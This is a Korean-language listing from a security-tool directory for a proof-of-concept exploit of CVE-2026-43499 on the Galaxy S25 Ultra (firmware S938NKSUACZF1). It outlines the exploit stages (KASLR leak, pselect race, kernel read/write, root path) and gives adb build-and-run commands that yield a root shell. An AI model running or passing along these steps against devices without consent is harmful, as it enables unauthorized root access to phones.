Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-43499-S25U — Galaxy S25 Ultra SM-S938N S938NKSUACZF1용 독립형 CVE-2026-43499 PoC | Kitploit
도구/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Android SecurityPrivilege EscalationExploitationPost-ExploitationRed TeamingPayload DevelopmentBinary Exploitation
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

Galaxy S25 Ultra SM-S938N S938NKSUACZF1용 독립형 CVE-2026-43499 PoC

저장소 보기
391031개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Galaxy S25 Ultra용 CVE-2026-43499 PoC

한국 Samsung Galaxy S25 Ultra에서 CVE-2026-43499에 대한 기기별 개념 증명 (PoC)입니다.

지원 대상

root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

위 펌웨어에서만 오프셋 및 구조 레이아웃이 유효합니다.

참조

이 포트는 다음을 기반으로 합니다:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • 업스트림 리비전: b850d3bddc74c3328d5fbcc0568d21962b55d949

업스트림 Apache License 2.0은 LICENSE에 유지됩니다.

포팅 변경 사항

  • pa3q-S938NKSUACZF1 오프셋 및 커널 레이아웃을 추가했습니다.
  • 이 Samsung 커널에 대해 tracefs 기반 KASLR 슬라이드 복구를 추가했습니다.
  • pselect 레이스, CFI/FOPS 단계 및 물리적 읽기/쓰기 프리미티브를 포팅했습니다.
  • 기기별 system_unbound_wq 사용자 모드 헬퍼 루트 경로를 추가했습니다.
  • 기기에 맞게 조정된 pselect 지연 시퀀스를 사용하는 격리된 재시도 프로세스를 추가했습니다.
  • 성공 후 회수된 페이지를 유지하여 활성 위조 객체 재사용을 방지합니다.

빌드

ANDROID_NDK_HOME을 Android NDK r29 또는 호환 도구 체인으로 설정하십시오:

root@kitploit:~
make -j8

출력물:

root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root

배포 및 실행

root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

익스플로잇은 기본적으로 16번의 독립적인 시도와 20,000 마이크로초의 기본 pselect 지연을 사용합니다. 타이밍 데이터 수집 시 다음을 재정의하십시오:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

임시 루트 세션 및 유지된 할당은 재부팅까지 지속됩니다.

원클릭 설치 및 KernelSU 지원을 위해 Root My Galaxy를 사용하십시오.

소유하거나 명시적으로 테스트 권한이 있는 기기에서만 사용하십시오.

도구 다운로드